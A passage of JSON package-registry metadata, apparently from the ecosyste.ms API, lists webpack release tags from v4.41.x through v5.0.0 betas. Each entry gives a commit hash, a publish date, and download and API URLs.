0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"